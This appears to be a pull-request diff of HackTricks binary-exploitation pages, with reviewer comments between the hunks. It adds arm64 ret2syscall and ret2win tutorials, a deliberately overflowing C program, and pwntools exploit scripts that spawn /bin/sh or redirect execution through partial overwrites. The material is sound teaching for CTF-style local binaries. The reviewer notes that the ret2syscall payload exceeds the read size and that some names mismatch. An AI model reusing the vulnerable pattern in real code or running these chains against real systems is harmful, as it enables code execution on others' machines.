* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code
|
||||||
|
|
||||||
|
We are going to use the example from the page:
|
||||||
|
|
||||||
|
{% content-ref url="../../stack-overflow/ret2win/ret2win-arm64.md" %}
|
||||||
|
[ret2win-arm64.md](../../stack-overflow/ret2win/ret2win-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
printf("Congratulations!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie and canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o ret2win ret2win.c -fno-stack-protector
|
||||||
|
```
|
||||||
|
|
||||||
|
## Gadgets
|
||||||
|
|
||||||
|
In order to prepare the call for the **syscall** it's needed the following configuration:
|
||||||
|
|
||||||
|
* `x8: 221 Specify sys_execve`
|
||||||
|
* `x0: ptr to "/bin/sh" specify file to execute`
|
||||||
|
* `x1: 0 specify no arguments passed`
|
||||||
|
* `x2: 0 specify no environment variables passed`
|
||||||
|
|
||||||
|
Using ROPgadget.py I was able to locate the following gadgets:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```armasm
|
||||||
|
;Load x0, x1 and x3 from stack and x5 and call x5
|
||||||
|
0x0000000000114c30:
|
||||||
|
ldp x3, x0, [sp, #8] ;
|
||||||
|
ldp x1, x4, [sp, #0x18] ;
|
||||||
|
ldr x5, [sp, #0x58] ;
|
||||||
|
ldr x2, [sp, #0xe0] ;
|
||||||
|
blr x5
|
||||||
|
|
||||||
|
;Move execve syscall (0xdd) to x8 and call it
|
||||||
|
0x00000000000bb97c :
|
||||||
|
nop ;
|
||||||
|
nop ;
|
||||||
|
mov x8, #0xdd ;
|
||||||
|
svc #0
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
With the previous gadgets we can control all the needed registers from the stack and use x5 to jump to the second gadget to call the syscall.
|
||||||
|
|
||||||
|
### Exploit
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
p = process('./ret2syscall')
|
||||||
|
elf = context.binary = ELF('./ret2syscall')
|
||||||
|
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
|
||||||
|
libc.address = 0x0000fffff7df0000 # ASLR disabled
|
||||||
|
binsh = next(libc.search(b"/bin/sh"))
|
||||||
|
|
||||||
|
stack_offset = 72
|
||||||
|
|
||||||
|
#0x0000000000114c2c : bl #0x133070 ; ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
|
||||||
|
load_x0_x1_x2 = libc.address + 0x114c30 # ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
|
||||||
|
|
||||||
|
# 0x00000000000bb97c : nop ; nop ; mov x8, #0xdd ; svc #0
|
||||||
|
call_execve = libc.address + 0xbb97c
|
||||||
|
|
||||||
|
print("/bin/sh in: " + hex(binsh))
|
||||||
|
print("load_x0_x1_x2 in: " + hex(load_x0_x1_x2))
|
||||||
|
print("call_execve in: " + hex(call_execve))
|
||||||
|
|
||||||
|
# stack offset
|
||||||
|
bof = b"A" * (stack_offset)
|
||||||
|
bof += p64(load_x0_x1_x2)
|
||||||
|
|
||||||
|
# ldp x3, x0, [sp, #8]
|
||||||
|
rop = b"BBBBBBBBBBBBBBBB" #x3
|
||||||
|
rop += p64(binsh) #x0
|
||||||
|
|
||||||
|
# ldp x1, x4, [sp, #0x18]
|
||||||
|
rop += b"C"*(0x18 - len(rop))
|
||||||
|
rop += p64(0x00) # x1
|
||||||
|
rop += b"CCCCCCCC" #x4
|
||||||
|
|
||||||
|
# ldr x5, [sp, #0x58]
|
||||||
|
rop += b"D"*(0x58 - len(rop))
|
||||||
|
rop += p64(call_execve) # x5
|
||||||
|
|
||||||
|
# ldr x2, [sp, #0xe0]
|
||||||
|
rop += b"E" * (0xe0 - len(rop))
|
||||||
|
rop += p64(0x00) # x2
|
||||||
|
|
||||||
|
payload = bof + rop
|
||||||
|
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
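Review bot: the exploit payload is longer than the program will ever read. `read(STDIN_FILENO, buffer, 256)` delivers at most 256 bytes per call, but the payload is 72 + 8 + 0xe8 = 312 bytes, so the `x2` slot the gadget loads with `ldr x2, [sp, #0xe0]` (payload offset 304) is never written and `x2` holds whatever was already on the stack; `execve` then only succeeds if that happens to be NULL or a valid `envp`. Either pick a gadget that reads x2 from a lower offset, set x2 through a second gadget, or raise the read size in the example, and say which. The text says "Compile without pie and canary" but the command has no `-no-pie`, and it builds `ret2win` while the exploit runs `./ret2syscall`; since every address here comes from libc at its fixed no-ASLR base, PIE does not matter, so drop the claim and align the names. Minor: the comment `rop = b"BBBBBBBBBBBBBBBB" #x3` covers 16 bytes of which the first 8 are skipped by `ldp x3, x0, [sp, #8]`, so label it "8 unused + x3", and `libc.address = 0x0000fffff7df0000` should be checked with `vmmap` before use.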
@ -28,8 +28,8 @@ Calling the syscall **`sigreturn`** from a ROP chain and **adding the registry v
|
||||||
|
|
||||||
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
|
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
|
||||||
|
|
||||||
{% content-ref url="rop-syscall-execv.md" %}
|
{% content-ref url="rop-syscall-execv/" %}
|
||||||
[rop-syscall-execv.md](rop-syscall-execv.md)
|
[rop-syscall-execv](rop-syscall-execv/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
|
If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
|
||||||
|
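Review bot: the content-ref target changes from `rop-syscall-execv.md` to the directory `rop-syscall-execv/`, which only resolves if the page was moved to `rop-syscall-execv/README.md` in the same change set; please confirm the move is included, since a dangling directory link breaks GitBook navigation silently. While touching this block, the context line `Note how this would be a **type of Ret2syscall** that makes much easier to control params` should read `that makes it much easier to control the parameters`.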
@ -145,11 +145,11 @@ target.interactive()
|
||||||
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
|
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
|
||||||
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
|
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
|
||||||
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
|
||||||
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv.md) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
|
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
|
||||||
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
|
||||||
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv.md) via a **sigreturn** structure (the binary has the string `/bin/sh`).
|
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`).
|
||||||
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
|
||||||
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](rop-syscall-execv.md). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
|
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
|
||||||
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
|
||||||
* 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
|
* 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
|
||||||
|
|
||||||
|
|
|
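Review bot: the last two bullets (inctf17_stupidrop and swamp19_syscaller) are re-touched for the link rename but keep several errors a reader will trip over: `set registries` should be `set registers`, `read intro ESP` should be `read into ESP`, `intruction` should be `instruction`, and `memprotect` is not a syscall name; the call described (remapping the binary's memory as `rwx`) is `mprotect`. The swamp19 bullet also opens with `64 bits` but then names `eip` and `ESP`; `rip` and `rsp` would match the architecture it describes.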
@ -77,16 +77,16 @@ However, in other scenarios maybe just **overwriting some variables values in th
|
||||||
|
|
||||||
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
||||||
|
|
||||||
{% content-ref url="ret2win.md" %}
|
{% content-ref url="ret2win/" %}
|
||||||
[ret2win.md](ret2win.md)
|
[ret2win](ret2win/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Stack Shellcode
|
### Stack Shellcode
|
||||||
|
|
||||||
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
||||||
|
|
||||||
{% content-ref url="stack-shellcode.md" %}
|
{% content-ref url="stack-shellcode/" %}
|
||||||
[stack-shellcode.md](stack-shellcode.md)
|
[stack-shellcode](stack-shellcode/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### ROP & Ret2... techniques
|
### ROP & Ret2... techniques
|
||||||
|
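Review bot: same directory-link rename as on the SROP page, now for `ret2win/` and `stack-shellcode/`, and the link text drops the `.md` suffix consistently (`[ret2win](ret2win/)`); since the ROP content-ref in the next hunk already used the directory form (`../rop-return-oriented-programing/`), every technique link on this page now expects a `README.md` inside the directory, so please verify they all exist. Separately, the ret2win paragraph says `usually ASLR would be disabled`; the address of a function inside a non-PIE binary is fixed regardless of ASLR, and what must be absent for a hard-coded win address is PIE (as the ret2win page's own Protections list states), so `usually PIE would be disabled` is the precise statement.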
@ -97,6 +97,14 @@ This technique is the fundamental framework to bypass the main protection to the
|
||||||
[rop-return-oriented-programing](../rop-return-oriented-programing/)
|
[rop-return-oriented-programing](../rop-return-oriented-programing/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Heap Overflows
|
||||||
|
|
||||||
|
An overflow is not always going to be in the stack, it could also be in the **heap** for example:
|
||||||
|
|
||||||
|
{% content-ref url="../heap/heap-overflow.md" %}
|
||||||
|
[heap-overflow.md](../heap/heap-overflow.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Types of protections
|
## Types of protections
|
||||||
|
|
||||||
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
|
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
|
||||||
|
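Review bot: the new Heap Overflows section is one sentence plus a content-ref to `../heap/heap-overflow.md`, and nothing in this diff adds that file, so please confirm `binary-exploitation/heap/heap-overflow.md` exists in the tree or the link will 404. A one-line hint about what differs would also help the reader decide whether to follow the link: a heap overflow has no saved return address to reach and instead corrupts the neighbouring chunk's data or the allocator's metadata, so the techniques involved are different from everything listed above it.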
@ -105,8 +113,6 @@ There are several protections trying to prevent the exploitation of vulnerabilit
|
||||||
[common-binary-protections-and-bypasses](../common-binary-protections-and-bypasses/)
|
[common-binary-protections-and-bypasses](../common-binary-protections-and-bypasses/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -89,8 +89,8 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
* [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
|
|
||||||
## Other examples & References
|
## Other examples & References
|
||||||
|
|
||||||
|
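Review bot: the link depth change from `../` to `../../` is right because `ret2win.md` becomes `ret2win/README.md`, but only the two Protections bullets are shown as updated; every other relative path in this file (images under `.gitbook/assets`, the `rop-syscall-execv` link, the other content-refs) needs the same treatment or it breaks after the move, so please check the rest of the file. In the Stack Canaries bullet `won't never be followed` is a double negative; `will never be followed` is what is meant. The PIE bullet's `1/16 chance (1 nibble)` reasoning is sound (a 2-byte overwrite touches 4 nibbles and the low 3 are the fixed page offset), and it is exactly the caveat missing from the new ret2win-arm64 page's PIE example, so a cross-reference from there to this bullet would be useful.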
@ -113,6 +113,16 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
* The program is only validating the last byte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
|
* The program is only validating the last byte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
|
||||||
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
||||||
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/](https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/)
|
||||||
|
* arm64, PIE, it gives a PIE leak the win function is actually 2 functions so ROP gadget that calls 2 functions
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/)
|
||||||
|
* ARM64, off-by-one to call a win function
|
||||||
|
|
||||||
|
## ARM64 Example
|
||||||
|
|
||||||
|
{% content-ref url="ret2win-arm64.md" %}
|
||||||
|
[ret2win-arm64.md](ret2win-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
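Review bot: the new 8ksec bullet `arm64, PIE, it gives a PIE leak the win function is actually 2 functions so ROP gadget that calls 2 functions` is missing punctuation and a verb; something like `arm64, PIE. The binary leaks a PIE address; the win condition requires calling two functions in sequence, so a small ROP chain is used instead of a single return address` reads cleanly. The new `## ARM64 Example` heading is placed after `## Other examples & References`, but the content-ref it wraps is a worked example rather than a reference, so it belongs before the references list with the other examples. Unrelated but in the context lines: `any zie` should be `any size`.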
214
binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
Normal file
|
@ -0,0 +1,214 @@
|
||||||
|
# Ret2win - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
printf("Congratulations!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie and canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
```
|
||||||
|
|
||||||
|
## Finding the offset
|
||||||
|
|
||||||
|
### Pattern option
|
||||||
|
|
||||||
|
This example was created using [**GEF**](https://github.com/bata24/gef):
|
||||||
|
|
||||||
|
Stat gdb with gef, create pattern and use it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
pattern create 200
|
||||||
|
run
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1202).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pattern search $x30
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1203).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
**The offset is 72 (9x48).**
|
||||||
|
|
||||||
|
### Stack offset option
|
||||||
|
|
||||||
|
Start by getting the stack address where the pc register is stored:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
b *vulnerable_function + 0xc
|
||||||
|
run
|
||||||
|
info frame
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1204).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
|
||||||
|
|
||||||
|
```
|
||||||
|
b *vulnerable_function+28
|
||||||
|
c
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Find where this pattern is stored in memory:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt="" width="339"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
## No PIE
|
||||||
|
|
||||||
|
### Regular
|
||||||
|
|
||||||
|
Get the address of the **`win`** function:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
objdump -d ret2win | grep win
|
||||||
|
ret2win: file format elf64-littleaarch64
|
||||||
|
00000000004006c4 <win>:
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p64(0x00000000004006c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Off-by-1
|
||||||
|
|
||||||
|
Actually this is going to by more like a off-by-2 in the stored PC in the stack. Instead of overwriting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`.
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x06c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability.
|
||||||
|
|
||||||
|
## With PIE
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
Compile the binary **without the `-no-pie` argument**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Off-by-2
|
||||||
|
|
||||||
|
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x07d4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
